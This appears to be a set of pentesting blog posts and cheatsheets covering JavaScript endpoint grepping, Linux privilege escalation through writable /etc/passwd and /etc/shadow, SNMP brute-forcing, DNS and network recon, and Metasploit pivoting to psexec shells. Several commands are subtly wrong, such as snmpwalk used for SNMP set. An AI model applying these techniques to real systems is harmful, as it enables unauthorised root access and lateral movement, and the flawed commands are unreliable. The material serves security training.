WebApp 101

Panning for Gold in JavaScript Files Using Burp Suite and Grep

As part of a webapp pentest, or when hunting for bug bounties, being able to find API endpoints, URIs, and sometimes even commented credentials/API keys through Javascript files is a good skillset to have. Luckily, using Burp Suite and Grep, it’s pretty trivial to hunt for this information.

Note: This post is fairly incomplete and will be updated as time goes on.


To begin, make sure you have your Burp Suite project capturing data as you browse the application. Manually crawl the website by navigating to every page and feature that you can find. Then, have Burp Suite crawl the page and do some enumeration of its own. Don’t skip this part, and make sure you do a thorough job, or you may be leaving Javascript files undiscovered.

Once properly enumerated, let’s extract all of the scripts that we can. This can be done by navigating to the Target tab, and selecting Site Map. Right click the target URL, head over to Engagement Tools, and then select Find Scripts.

Let’s start by updating our box installing Pip, and installing JavaScript Beautifier.

sudo apt update -y && sudo apt upgrade -y
sudo apt install python3-pip -y
sudo pip3 install jsbeautifier

Once you have the tool installed, run it specifying your input and output files.

js-beautify -o beautify.js input.js

Now that the output in cleaned up, you can get started grepping through it for gold!


Helpful grep commands

To find all that contain cmsapi:
grep --color -E "'\/cmsapi\/[^']+'" beautify.js

To find all items between single or double quotes:
grep --color -E "'\/[^']+'|\"\/[^\"]+\"" beautify.js

Tips & Tricks

Adding/Fixing Color Within Tmux on Ubunutu

I’ve found that anytime I spin up an Ubuntu system, whether in Digital Ocean, Google Cloud, or even through Windows Subsystem for Linux, color doesn’t seem to be working properly.

To fix this, there is a handy workaround that is very simple to implement.


First, let’s create a bash alias so that launching Tmux will actually launch with color settings configured. Start by editing the following file.

vi ~/.bash_aliases

Then add the following line.

alias tmux="TERM=xterm-256color tmux"

Now we will modify our Tmux configuration file as well.

vi ~/.tmux.conf

And add the following line.

set -g default-terminal "screen-256color"

Then we will restart Tmux.

tmux kill-server && tmux

That’s it! Launch Tmux and you should now have color.

Hacking Tutorial

Linux Privilege Escalation: Weak File Permissions – Writable /etc/passwd

The /etc/passwd file contains information about user accounts. It is world-readable, but usually only writable by the root user. Historically, the /etc/passwd file contained user password hashes, and some versions of Linux will still allow password hashes to be stored there. If we have write access to this file as a low level user, we can abuse this privilege to actually overwrite the root user’s password hash.


Method 1 – Overwriting root password

Do do this, let’s first check the file permissions on the /etc/passwd file. In our example, we can see that our user account has read/write access.
ls -la /etc/passwd

Now we can use openssl to generate a new password hash in the format used by /etc/passwd.
openssl passwd <newPassword>

Now let’s edit the /etc/passwd file and paste the newly generated hash between the first and second colon.
vi /etc/passwd

Finally, we can switch to the root user using the new password.
su root


Method 2 – Creating a new user account

Alternatively, you could have also created a new user account with root group membership. This can easily be done in two steps:

  1. Copy the root user line, and paste it to the bottom of the /etc/shadow file.
  2. Place a password hash that you control between the first and 2nd colon.

Once this is done, you can simply switch to the new user.
su newroot

Hacking Tutorial

Linux Privilege Escalation: Weak File Permissions – Writable /etc/shadow

The /etc/shadow file contains user password hashes and is usually readable only by the root user. When this file is misconfigured, and global write access is allowed, this can allow us to overwrite the root password hash with one that we control.

Do do this, let’s first check the file permissions on the /etc/shadow file. In our example, we can see that our user account has read/write access.
ls -la /etc/shadow

Knowing that we can write to this file, let’s create a password hash that we control. While all we need to do is generate a SHA-512 hash, we can actually use a pre-installed utility called mkpasswd to generate one for us.
mkpasswd -m sha-512 <newPassword>

Copy the hash that gets generated, and lets go edit the /etc/shadow file.
vi /etc/shadow

You’ll want to paste the password between the first and second colon symbols. If a hash is present, overwrite it.

Once the file has been changed, you can now switch to the root user using the password you passed to the mkpasswd command.
su root

Enumeration Cheatsheets

Wireshark Filters Cheatsheet

There are literally hundreds of these type of posts on the internet, with one of my favorites being https://wiki.wireshark.org/CaptureFilters. However, I wanted to create this ‘short’ list that contains my favorite go-to’s after performing Man in the Middle attacks.

This post will be updated as time goes on.

Understanding the Packet Capture

Before diving too deep, it’s always a good idea to get an idea of what type of traffic was captured so you know which filters to apply.

Viewing Protocol Statistics:
In the Menu, click on Statistics and select Protocol Hierarchy.


Filtering HTTP

If non-encrypted HTTP traffic was captured, we may be able to extract juicy details.

View all plaintext HTTP GET requests:
http.request.method == "GET"

View all plaintext HTTP POST requests:
http.request.method == "POST"

Filtering by specific redirect location:
http.location == login_success.php

To export HTTP objects (such as images or pages):
Select File. Click on Export Objects, and then HTTP.

Remember to always Right-Click a packet, and Follow the TCP Stream to get more details from the raw data.


Filtering FTP

FTP is pretty simple, since all traffic is sent in plaintext.

To view all FTP related traffic:
ftp

To export FTP objects (such as transferred files):
Select File. Click on Export Objects, and then TFTP.

Remember to always Right-Click a packet, and Follow the TCP Stream to get more details from the raw data.


Filtering SMB

SMB is a favorite to capture, as it is usually not encrypted and you may be able to exfiltrate files over the wire.

To view packets related to SMB files:
smb.file

To export SMB objects (such as transferred files):
Select File. Click on Export Objects, and then SMB.

Tips & Tricks

Tcpdump Cheatsheet

This post contains various commands that may come in useful when utilizing tcpdump. This article will be expanded upon as time goes on.


Basic Usage

Run tcpdump to collect traffic:
sudo tcpdump -i <interface>

Run tcpdump with verbosity:
sudo tcpdump -i <interface> -v

Disable DNS Conversation:
sudo tcpdump -i <interface> -n

Quieter output:
sudo tcpdump -i <interface> -q

Specify the number of packets to capture:
sudo tcpdump -i <interface> -c 100


Applying Filters

Filter based on ICMP requests:
sudo tcpdump -i <interface> icmp

Filter based on IP or hostname:
sudo tcpdump -i <interface> host <hostname>

Filter based on specific source/destination address:
sudo tcpdump -i <interface> src 10.0.0.1 and dst 10.0.0.2

Rather than filter based on source/destination, you can use Grep:
sudo tcpdump -i <interface> | grep <ipAddr>


Saving / Reading Output

To save output to a text file:
sudo tcpdump -i <interface> -w output_file.txt

To read output from a text file:
sudo tcpdump -i <interface> -r output_file.txt

Enumeration Cheatsheets

Enumerating SNMP for Pentesting (UDP Ports 161, 162)

This post contains various commands and methods for performing enumeration the SNMP service. This article will be expanded upon as time goes on.


Using NMAP

Bruteforcing community strings:
sudo nmap -sU -p 161 --script snmp-brute <ipAddr>

Bruteforcing community strings with custom wordlist:
sudo nmap -sU -p 161 --script snmp-brute --script-args snmp-brute.communitiesdb=/usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt <ipAddr>

Enumerate users on remote machine:
sudo nmap -sU -p 161 --script snmp-win32-users <ipAddr>

Enumerate services on remote machine:
sudo nmap -sU -p 161 --script snmp-win32-services <ipAddr>

Run all SNMP-related Nmap Scripts:
sudo nmap -sU -p 161 --script snmp-* <ipAddr> -oG nmap/snmp.txt


Using SNMPWALK

Enumerate SNMPv2 with a community string of Public:
snmpwalk -v2c -c public <ipAddr>

To search for installed software:
snmpwalk -v2c -c public <ipAddr> hrSWInstalledName

To search amount of RAM on the host:
snmpwalk -v2c -c public <ipAddr> hrMemorySize

Note: There are additional OIDs that you can provide to enumerate specific information.


Using ONESIXTYONE

To brute-force communities:
onesixtyone -c /usr/share/doc/onesixtyone/dict.txt <ipAddr>


Using SNMPSET

To change an OID to a different value:
snmpwalk -v2c -c public <ipAddr> <OID> <newValue>

To change the sysContact OID:
snmpwalk -v2c -c public <ipAddr> sysContact <newValue>


Enumeration Cheatsheets

Active & Passive Recon Cheatsheet

This post contains various commands and methods for performing passive recon of a target. This article will be expanded upon as time goes on.


Performing Whois lookups

We can utilize public WHOIS databases to perform lookups on domains.
https://lookup.icann.org/

It may also be worthwhile utilizing other services, such as Namecheap. Once you know who the registrar is, it is typically best to perform a Whois lookup for your target using their domain registrar.
https://www.namecheap.com/domains/whois/

We can also utilize a Kali terminal for this:
whois <targetDomain>

You can use additional options to instruct the tool to use a different server.
whois -h whois.godaddy.com <targetDomain>


Performing DNS enumeration with Nslookup

To perform a lookup of the A records against a particular domain:
nslookup <targetDomain>

To look up the mail records:
nslookup -query=mx <targetDomain>

To look up Nameservers:
nslookup -query=ns <targetDomain>

To get all records that are available:
nslookup -query=any <targetDomain>

You can also drop into nslookup with no parameters interactively.
nslookup

While interactively working with nslookup, you can set your query:
set q=mx

You can also set your server if you wanted to query a different DNS server than your default one:
server 8.8.8.8


Performing DNS enumeration with Dig

To extract A records and Namerservers of a domain:
dig <targetDomain>

To query just A records:
dig <targetDomain> A

You can also limit the output to a specific record, and just return the answer section:
dig +nocmd <targetDomain> MX +noall +answer

Can attempt a DNS Zone transfer:
dig +nocmd <targetDomain> AXFR +noall +answer @<targetDNSServer>

To see more about a DNS Zone Transfer, see https://infinitelogins.com/2020/04/23/performing-dns-zone-transfer/


Automating DNS Enumeration

Fierce can be used to enumerate subdomains, IP ranges, and hostnames by using public DNS queries, zone transfer attempts, and brute forcing techniques.
fierce -dns <targetDomain>

You can also specify a specific DNS server for the tool to use.
fierce -dns <targetDomain> -dnsserver <targetNamserver>

We can also leverage a tool called DNSEnum to do something similar. It will look for the A records of the target domain, looks up the NS and MX records. Finally, it will attempt a zone transfer attack.
dnsenum <targetDomain>

You can also specify a specific DNS server for the tool to use. Sometimes the results will differ.
dnsenum <targetDomain> --dnsserver <targetNamserver>

You can use DNSEnum to brute force subdomains as well.
dnsenum <targetDomain> -f <dictionaryList>

DNSMap can also be used, but it doesn’t do much other than brute-force with a built-in wordlist.
dnsmap <targetDomain> -w wordlist.txt -r /tmp/results.txt

DNSMap to enumerate subdomains in bulk fashion:
dnsmap-bulk.sh domains.txt /tmp/results.txt

DNSRecon is an ‘all-in-one’ tool that can do most everything.
dnsrecon -d <targetDomain>


Google and Bing Dorking

Bing offers a query filter that returns websites hosted on a given IP address by entering the following Bing search:
ip:<targetIP>

Search Google for results within a particular website:
insite:<targetURL>

Search Google for specific filetypes:
insite:<targetURL> filetype:pdf

Search Google for particular text in title:
insite:<targetURL> intitle:admin
insite:<targetURL> intitle:index of

Search Google for particular text in body:
insite:<targetURL> intext:admin
insite:<targetURL> intext:index of

Additional payloads are found here. https://gist.github.com/clarketm/919457847cece7ce40323dc217623054


Various Tools:

Enumeration Cheatsheets

Network Enumeration and Host Discovery Cheatsheet

This post contains various commands and methods for performing enumeration of a network. This article will be expanded upon as time goes on.


Quick Host Discovery using ARP Protocol

Using NETDISCOVER to perform an ARP scan:
sudo netdiscover -i <interface> -r <targetSubnet>

Using ARP-SCAN to perform an ARP scan:
sudo arp-scan -I <interface> <targetSubnet>


Identifying your Immediate Routes and Gateways

Windows will show the default gateway:
ipconfig /all

In Linux, you can use TRACEROUTE:
traceroute <targetIP> -m 5

In Linux, you can look at the routing table:
route

To see which routes you may have access to:
ip route show dev <interface>


Portscanning with Nmap and Hping

Nmap

My go-to nmap command:
sudo nmap -sV -sC -p- <ipAddr> -oA nmap/top1000

Using Nmap for a pingsweep without port discovery:
sudo nmap -PE -sn -n <ipRange> -oA nmap/pingsweep

Using Nmap for pingsweep, with top 20 port discovery:
sudo nmap -PE -n <ipRange> --top-ports 20

Using Nmap to scan UDP ports:
sudo nmap -sU <ipRange>

Using Nmap for ARP Scan:
sudo nmap -PR -sn <ipRange>

Sometimes filtering may in place to only allow certain source ports on the network. To get around that, we could use the following Nmap command to scan DNS port 53 with a source port of 53:
sudo nmap -sS --source-port 53 -p 53 <ipRange> -oA nmap/dns-servers

Hping

Hping is also useful as its always a good idea to get a 2nd opinion. The following will scan a specific port with 3 SYN packets.
sudo hping3 -S <ipAddr> -p <port> -c 3

To use Hping to scan a port range, but exclude port 525:
sudo hping3 -S --scan '80,445,500-550,!525' <ipAddr> -V

To use Hping for UDP scans:
sudo hping3 -2 --scan 1-1000 <ipAddr>

Sometimes filtering may in place to only allow certain source ports on the network. To get around that, we could use the following Hping command to scan DNS port 53 with a source port of 53:
sudo hping3 -S -s 53 -k -p 53 <ipAddr>


Host Enumeration Using FPing

We can leverage fPing to do a quick search on the network for alive hosts.
fping -A <targetIP>

We can also add an option to limit the number of retries attempted, speeding up the execution.
fping -A <targetIP> -r 0

Adding another option will allow us to view the time it took to retrieve the reply.
fping -A <targetIP> -e

To sweep a network efficiently, without retires, and only display the alive hosts:
fping -q -a -g 10.0.0.0/24 -r 0 -e


From within a Meterpreter session:

Display the network adapters and their associated IP addresses:
ifconfig

Display nearby machines on the network:
arp

Display entries on the local routing table:
route

Perform an ARP scan for a given IP range:
run arp_scanner -r 10.0.0.0/24

View existing configured routes in Metasploit:
route print

Forward specific port to a remote host, through the Meterpreter session. Any traffic send to the local port of our localsystem will route through the Meterpreter session.
portfwd add -l <localPort> -p <remotePort> <destinationIP>


Handy Metasploit modules:

Run a ping sweep through a compromised system:
use post/multi/gather/ping_sweep

Configure a Metasploit route for pivoting:
use post/multi/manage/autoroute

You can also configure a route while interacting with a Meterpreter session:
run autoroute -s <subnet>

Run a TCP port scan (you may want to configure a route first):
use auxiliary/scanner/portscan/tcp

Configure a Socks4 proxy for pivoting. Any traffic routed through the proxy will route through the Metasploit routing table:
https://infinitelogins.com/2021/02/20/using-metasploit-routing-and-proxychains-for-pivoting/


Windows Utilities (LOLbins)

Display network adapters, DNS servers, and additional details:
ipconfig /all

Identify details about the DNS cache:
ipconfig /displaydns

To view details about ports and services on the system:
netstat -ano


Tips & Tricks

Pivoting to Attack Remote Networks Through Meterpreter Sessions and Proxychains


How to configure the tools

Once you have a Meterpreter session for a compromised machine, you can utilize Metasploit to start leveraging that machine as a proxy. This is very useful, as you will be able to run tools from your attacker system, outside the network, against systems that are local to the network you’ve compromised a single host on.

Configuring the route in Metasploit

To begin, we’re going to assume you already have an active Meterpreter session. We’ll start by backgrounding your Meterpreter session, and using the following module.
use post/multi/manage/autoroute

There will be an option where you can select the victim session.
set SESSION 1

And configure the victim’s subnet. Any traffic issued by Metasploit to an address within this subnet will be routed through the previously selected session.
set SUBNET 10.0.0.0/24

You can run the following command to confirm your route has been successfully created.
route print

Configuring the Socks4 Proxy

Now that we have the route configured, we’ll switch to a different module.
use auxiliary/server/socks_proxy
set VERSION 4a

Once running, this module will forward any traffic issue to its SRVHOST and SRVPORT through the Metasploit routing table. Since we just added an entry in our routing table to send traffic through Meterpreter session 1, this should allow us the ability to utilize tools on our local attacking system. If the default port of 1080 works for you, leave the default and run the module.
run

Now, let’s head over to our attacker system and adjust our Proxychains configuration file.
sudo vi /etc/proxychains.conf

Adjust the last line of the file to route traffic through the Socks4 proxy listening at 127.0.0.1 on port 1080 (this is the configuration of our socks4a module in Metasploit).
socks4 127.0.0.1 1080

Running tools through the proxy

Finally, we can now utilize tools on our local filesystem to interact with hosts on the remote network.
proxychains ssh root@<remoteHost>

To utilize Nmap, you’ll need additional flags. Your scan will also take longer than it would without the pivot.
sudo proxychains nmap -sT -Pn -n <targetIP> --top-ports 50

To open a web browser that routes through the proxy, you can use:
proxychains firefox

Alternatively, you could also configure your browser to route through the proxy in the advanced settings, or you could leverage a add-in, such as FoxyProxy.

Keep in mind that since we’re routing traffic through the Meterpreter session, this session needs to stay active in order for us to reach hosts on the remote subnet. Also note that some tools, such as the default Nmap scan, may not work as they would if you were scanning a target directly.


Exploitation via pivoting

Once a route has been set up in Metasploit, you can now communicate to any host that the compromised host can communicate to. Assuming you know valid user credentials (or a NTLM hash), we can leverage PSExec to gain a shell on the remote system.
use exploit/windows/smb/psexec

Before running the above mentioned module, make sure you’ve already configured a route in Metasploit that will forward traffic destined to the remote machine through your active Meterpreter session.

In the event that the remote machine you wish to target does not have access to the internet, you can add a 2nd route in Metasploit so that traffic destined to address of your existing compromised connection will route through the Metasploit routing table. This would allow you to configure the LHOST of your Meterpreter payload to the local IP address on the host of your existing Meterpreter session.


Cleaning Up

It’s always important to clean up once you’re finished. From within Metasploit, we can stop the Socks4 proxy by running the following command to kill all jobs.
jobs -K

Then you can flush the routing table entry you configured.
route flush